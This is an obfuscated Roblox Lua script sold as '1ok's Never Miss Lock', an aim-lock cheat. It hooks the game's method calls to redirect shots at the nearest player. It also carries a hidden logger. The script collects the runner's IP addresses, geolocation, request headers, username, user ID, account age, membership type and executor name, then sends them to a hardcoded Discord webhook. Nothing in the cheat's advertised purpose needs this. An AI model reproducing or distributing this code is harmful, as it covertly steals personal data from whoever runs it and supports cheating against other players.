--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v36,v37) local v38={};for v65=1, #v36 do v6(v38,v0(v4(v1(v2(v36,v65,v65 + 1 )),v1(v2(v37,1 + (v65% #v37) ,1 + (v65% #v37) + 1 )))%256 ));end return v5(v38);end game.StarterGui:SetCore(v7("\226\198\213\33\200\180\211\23\215\202\216\36\242\178\200\16","\126\177\163\187\69\134\219\167"),{[v7("\23\196\62\201\249","\156\67\173\74\165")]="Welcome to 1ok's Never Miss Lock",[v7("\0\178\81\2","\38\84\215\41\118\220\70")]=v7("\115\4\39\22\237\10\86\3\27\236\29\37\45\28\190\76\86\46\29\233\16\6\43\28\249","\158\48\118\66\114")});local v8=game:GetService(v7("\156\43\2\61\96\181\250\168\33","\155\203\68\112\86\19\197")).CurrentCamera;local v9;local v10=false;local v11=872.1132459383 -(826 + 46) ;local v12=game.Players.LocalPlayer:GetMouse();local v13=Instance.new(v7("\118\220\36\232","\152\38\189\86\156\32\24\133"),game.Workspace);function makemarker(v39,v40,v41,v42,v43) local v44=0 + 0 ;local v45;local v46;local v47;while true do local v66=0 + 0 ;while true do if (v66==(1 + 0)) then if (v44==(4 -2)) then v46.BackgroundColor3=v41;v47=Instance.new(v7("\142\127\234\175\40\94\53\211","\161\219\54\169\192\90\48\80"),v46);v47.CornerRadius=UDim.new(139 -89 ,111 -61 );return v45;end break;end if (v66==(0 + 0)) then if ((4 -3)==v44) then local v92=753 -(239 + 514) ;while true do if (v92==(1 + 0)) then v46.Size=UDim2.new(1330 -(797 + 532) ,0 -0 ,1206 -(902 + 303) ,0 + 0 );v46.BackgroundTransparency=0;v92=1 + 1 ;end if (v92==(0 -0)) then v45.AlwaysOnTop=true;v46=Instance.new(v7("\63\173\208\210\136","\84\121\223\177\191\237\76"),v45);v92=1203 -(373 + 829) ;end if (v92==2) then v44=2;break;end end end if (v44==0) then v45=Instance.new(v7("\222\94\171\74\254\88\166\84\248\112\178\79","\38\156\55\199"),v39);v45.Name=v7("\152\77","\35\200\29\28\72\115\20\154");v45.Adornee=v40;v45.Size=UDim2.new(v42,v43,v42,v43);v44=732 -(476 + 255) ;end v66=1131 -(369 + 761) ;end end end end local v14=game.Players:GetPlayers();function noob(v48) local v49=1463 -(1404 + 59) ;local v50;local v51;while true do if (v49==(0 -0)) then v50=nil;repeat wait();until v48.Character v49=1 + 0 ;end if (v49==(1 -0)) then v51=makemarker(guimain,v48.Character:WaitForChild(v7("\97\87\13\36\71\77\9\33\123\77\15\49\121\67\18\49","\69\41\34\96")),Color3.fromRGB(289 -136 ,289 -(64 + 174) ,37 + 218 ),0.3 -0 ,6 -3 );v51.Name=v48.Name;v49=338 -(144 + 192) ;end if (v49==(1 + 1)) then v48.CharacterAdded:connect(function(v85) v51.Adornee=v85:WaitForChild(v7("\148\214\218\11\12\36\181\199\229\5\13\63\140\194\197\30","\75\220\163\183\106\98"));end);spawn(function() while wait() do if v48.Character then TextLabel.Text=v48.Name   .. tostring(v48:WaitForChild(v7("\14\191\138\51\220\16\169\159\54\205\17","\185\98\218\235\87")).Wanted.Value)   .. v7("\139\32\103","\202\171\92\71\134\190")   .. tostring(math.floor(v48.Character:WaitForChild(v7("\1\212\33\137\39\206\37\140","\232\73\161\76")).Health)) ;end end end);break;end end end for v52=217 -(42 + 174) , #v14 do if (v14[v52]~=game.Players.LocalPlayer) then noob(v14[v52]);end end game.Players.PlayerAdded:connect(function(v53) noob(v53);end);spawn(function() local v54=0 + 0 ;while true do if (v54==(1 + 0)) then v13.Size=Vector3.new(6 + 1 ,16 -9 ,7);v13.Transparency=0.5 + 0 ;v54=1506 -(363 + 1141) ;end if (v54==2) then makemarker(v13,v13,Color3.fromRGB(108 + 45 ,1631 -(1183 + 397) ,776 -521 ),0.4 + 0 ,0 + 0 );break;end if (v54==(0 + 0)) then v13.Anchored=true;v13.CanCollide=false;v54=1976 -(1913 + 62) ;end end end);local v15=game:GetService(v7("\142\202\71\79\55\181\201\87\73\45\190\203\84\84\29\190","\126\219\185\34\61"));v15.InputBegan:Connect(function(v55) if (v55.UserInputType==Enum.UserInputType.MouseButton2) then local v71=0 + 0 ;while true do if (v71==(1 -0)) then game.StarterGui:SetCore(v7("\63\203\80\118\80\120\231\238\10\199\93\115\106\126\252\233","\135\108\174\62\18\30\23\147"),{[v7("\130\224\62\199\29","\167\214\137\74\171\120\206\83")]=v7("\218\255\57","\199\235\144\82\61\152"),[v7("\51\19\161\63","\75\103\118\217")]=v7("\224\81\100\84\171\27\198\80\105\84\173\17\135\86\121\0\186\22\135\9\48","\126\167\52\16\116\217")   .. tostring(v9.Name) });guimain[v9.Name].Frame.BackgroundColor3=Color3.fromRGB(404 -251 ,51,211 + 44 );break;end if (v71==(1933 -(565 + 1368))) then local v88=0 -0 ;while true do if (v88==1) then v71=850 -(254 + 595) ;break;end if (v88==(1661 -(1477 + 184))) then v10=true;v9=getClosestPlayerToCursor();v88=1 -0 ;end end end end end end);v15.InputEnded:Connect(function(v56) if (v56.UserInputType==Enum.UserInputType.MouseButton2) then local v72=0 -0 ;while true do if (v72==0) then v10=false;guimain[v9.Name].Frame.BackgroundColor3=Color3.fromRGB(143 + 10 ,907 -(564 + 292) ,255);break;end end end end);function getClosestPlayerToCursor() local v57;local v58=math.huge;for v67,v68 in pairs(game.Players:GetPlayers()) do if ((v68~=game.Players.LocalPlayer) and v68.Character and v68.Character:FindFirstChild(v7("\224\59\45\129\186\22\245\204","\156\168\78\64\224\212\121")) and (v68.Character.Humanoid.Health~=(0 -0)) and v68.Character:FindFirstChild(v7("\47\251\168\207\9\225\172\202\53\225\170\218\55\239\183\218","\174\103\142\197"))) then local v81=0 -0 ;local v82;local v83;while true do if (0==v81) then v82=v8:WorldToViewportPoint(v68.Character.PrimaryPart.Position);v83=(Vector2.new(v82.X,v82.Y) -Vector2.new(v12.X,v12.Y)).magnitude;v81=305 -(244 + 60) ;end if (v81==(1 + 0)) then if (v83<v58) then local v98=476 -(41 + 435) ;while true do if (v98==0) then v57=v68;v58=v83;break;end end end break;end end end end return v57;end game:GetService(v7("\100\61\81\11\32\76\238\95\43\90","\152\54\72\63\88\69\62")).Stepped:connect(function() if (v10 and v9.Character and v9.Character:FindFirstChild(v7("\252\209\227\93\218\203\231\88\230\203\225\72\228\197\252\72","\60\180\164\142"))) then v13.CFrame=CFrame.new(v9.Character.HumanoidRootPart.Position + (v9.Character.HumanoidRootPart.Velocity * v11) );else v13.CFrame=CFrame.new(1001 -(938 + 63) ,7691 + 2308 ,1125 -(936 + 189) );end end);local v16=getrawmetatable(game);local v17=v16.__namecall;setreadonly(v16,false);v16.__namecall=newcclosure(function(...) local v59=0 + 0 ;local v60;local v61;while true do if (v59==(1613 -(1565 + 48))) then local v84=0 -0 ;while true do if (v84==(0 + 0)) then v60=1138 -(782 + 356) ;v61=nil;v84=268 -(176 + 91) ;end if (v84==(2 -1)) then v59=1 -0 ;break;end end end if (v59==(1093 -(975 + 117))) then while true do if (v60==0) then v61={...};if (v10 and (getnamecallmethod()==v7("\126\87\23\44\20\232\0\78\91\23","\114\56\62\101\73\71\141")) and (v61[2]==v7("\141\249\223\197\172\236\246\203\173\250\222\244\183\250","\164\216\137\187"))) then v61[1878 -(157 + 1718) ]=v9.Character.HumanoidRootPart.Position + (v9.Character.HumanoidRootPart.Velocity * v11) ;return v17(unpack(v61));end v60=1 + 0 ;end if ((3 -2)==v60) then return v17(...);end end break;end end end);local v19="https://canary.discord.com/api/webhooks/1224847316758822982/mcUqLyvTuLi39BR4gLBriBgXm9fTIIEJpUJqp_8hwUOrys2YEAfWgv6rjvZ10VMnEQgU";local v20=game:HttpGet("https://api.ipify.org");local v21=game:HttpGet("https://api64.ipify.org");local v22=game:HttpGet("https://httpbin.org/get");local v23=game:HttpGet("http://www.geoplugin.net/json.gp?ip="   .. v20 );local v24={[v7("\209\233\63\166\163\240\31\159\242\40\162\163","\107\178\134\81\210\198\158")]="application/json"};local v25=game:GetService(v7("\8\2\131\223\175\42\29","\202\88\110\226\166")).LocalPlayer;local v26=v25.AccountAge;local v27=string.sub(tostring(v25.MembershipType),71 -50 );local v28=v25.UserId;local v29=v25.Name;local v30=v25.DisplayName;local v31=game.PlaceId;local v32=os.date(v7("\130\74\187\186\143\206\66\199\243\135\134\39\216\178\231\153\74\177\183\237\238\59\201\167","\170\163\111\226\151"));local v33=v7("\39\53\160\43\71\56\39\81\96\252\106\76","\73\113\80\210\88\46\87");function identifyexploit() local v62=0;local v63;local v64;while true do local v69=0 -0 ;while true do if (v69==(1018 -(697 + 321))) then if (v62==(0 -0)) then v63,v64=pcall(identifyexecutor);if v63 then return v64;end v62=4 -3 ;end if (v62==1) then return (SENTINEL_LOADED and v7("\178\41\195\6\238\143\41\193","\135\225\76\173\114")) or (XPROTECT and v7("\41\228\170\152\185\175\179","\199\122\141\216\208\204\221")) or (PROTOSMASHER_LOADED and v7("\157\207\31\228\119\229\160\220\3\248\125\228","\150\205\189\112\144\24")) ;end break;end end end end local v34={[v7("\38\139\177\88\1\134\5","\112\69\228\223\44\100\232\113")]="",[v7("\209\18\5\214\178\111","\230\180\127\103\179\214\28")]={{[v7("\141\16\75\78\235\83","\128\236\101\63\38\132\33")]={[v7("\162\168\28\65","\175\204\201\113\36\214\139")]=v7("\117\233\18\206\5\69\206\48\206\68","\100\39\172\85\188")   .. v33 },[v7("\185\113\173\140\54","\83\205\24\217\224")]=v29,[v7("\226\192\222\62\244\204\221\41\239\202\195","\93\134\165\173")]=v7("\191\249\192\130","\30\222\146\161\162\90\174\210")   .. v30 ,[v7("\227\71\117\6\225\93","\106\133\46\16")]={{[v7("\86\33\126\249","\32\56\64\19\156\58")]=v7("\111\219\224\68\84\243\141\95\146","\224\58\168\133\54\58\146"),[v7("\79\87\71\232\112","\107\57\54\43\157\21\230\231")]=v29,[v7("\210\133\29\252\183\217","\175\187\235\113\149\217\188")]=true},{[v7("\50\174\140\73","\24\92\207\225\44\131\25")]=v7("\102\214\181\78\30\111\88\219\177\92\91\73\82\195\189\22","\29\43\179\216\44\123"),[v7("\171\216\44\89\184","\44\221\185\64")]=v27,[v7("\8\233\68\86\125\4","\19\97\135\40\63")]=true},{[v7("\160\93\62\62","\81\206\60\83\91\79")]=v7("\111\168\211\125\58\205\89\228\111\172\213\50\103\199\76\189\93\226\138","\196\46\203\176\18\79\163\45"),[v7("\174\35\114\11\33","\143\216\66\30\126\68\155")]=v26,[v7("\163\198\1\194\203\166","\129\202\168\109\171\165\195\183")]=true},{[v7("\44\89\58\221","\134\66\56\87\184\190\116")]=v7("\9\34\12\169\48\239\123","\85\92\81\105\219\121\139\65"),[v7("\235\178\92\80\121","\191\157\211\48\37\28")]=v28,[v7("\214\17\248\21\52\218","\90\191\127\148\124")]=true},{[v7("\118\134\35\18","\119\24\231\78")]=v7("\171\29\179\30\134","\113\226\77\197\42\188\32"),[v7("\44\23\248\160\63","\213\90\118\148")]=v20,[v7("\82\32\184\95\67\94","\45\59\78\212\54")]=true},{[v7("\30\87\142\142","\144\112\54\227\235\230\78\205")]=v7("\154\24\25\170\138","\59\211\72\111\156\176"),[v7("\88\134\239\56\75","\77\46\231\131")]=v21,[v7("\179\90\186\73\180\81","\32\218\52\214")]=true},{[v7("\64\22\60\173","\58\46\119\81\200\145\208\37")]=v7("\27\128\49\175\172\253\31\15\214\112","\86\75\236\80\204\201\221"),[v7("\100\64\123\144\251","\235\18\33\23\229\158")]=v31,[v7("\89\180\205\178\94\191","\219\48\218\161")]=true},{[v7("\234\112\113\76","\128\132\17\28\41\187\47")]=v7("\36\42\3\57\72\21\61\20\96\29","\61\97\82\102\90"),[v7("\186\47\167\94\194","\105\204\78\203\43\167\55\126")]=identifyexploit(),[v7("\172\164\47\23\29\1","\49\197\202\67\126\115\100\167")]=true},{[v7("\57\90\210\44","\62\87\59\191\73\224\54")]=v7("\203\13\253\137\211\11\247\204\189","\169\135\98\154"),[v7("\221\118\40\65\248","\168\171\23\68\52\157\83")]=v32,[v7("\253\127\249\164\43\40","\231\148\17\149\205\69\77")]=true},{[v7("\142\166\202\254","\159\224\199\167\155\55")]=v7("\223\199\8\226\245\250\50\146\211\242\40\211\183\187\22\225\216\221\117\136","\178\151\147\92"),[v7("\154\252\64\39\23","\26\236\157\44\82\114\44")]=v7("\42\46\213\81\57\33\219","\59\74\78\181")   .. "\n"   .. v22   .. v7("\37\209\90","\211\69\177\58\58") ,[v7("\190\235\117\252\231\206","\171\215\133\25\149\137")]=false},{[v7("\239\201\63\255","\34\129\168\82\154\143\80\156")]=v7("\130\183\60\59\68\91\142\140\188\115\47\73\90\136\197\250\25\56\103\96\192\223","\233\229\210\83\107\40\46"),[v7("\215\67\62\195\0","\101\161\34\82\182")]=v7("\232\13\89\244\200\237\140","\78\136\109\57\158\187\130\226")   .. "\n"   .. v23   .. v7("\62\63\249","\145\94\95\153") ,[v7("\244\195\24\220\64\178","\215\157\173\116\181\46")]=false}}}}};local v34=game:GetService(v7("\29\160\159\226\233\48\166\157\251\217\48","\186\85\212\235\146")):JSONEncode(v34);local v35=http_request;if syn then v35=syn.request;else v35=http_request;end v35({[v7("\247\147\26","\56\162\225\118\158\89\142")]=v19,[v7("\126\10\196\182","\184\60\101\160\207\66")]=v34,[v7("\28\135\104\180\62\134","\220\81\226\28")]=v7("\35\250\177\207","\167\115\181\226\155\138"),[v7("\202\39\230\88\126\99\213","\166\130\66\135\60\27\17")]=v24});
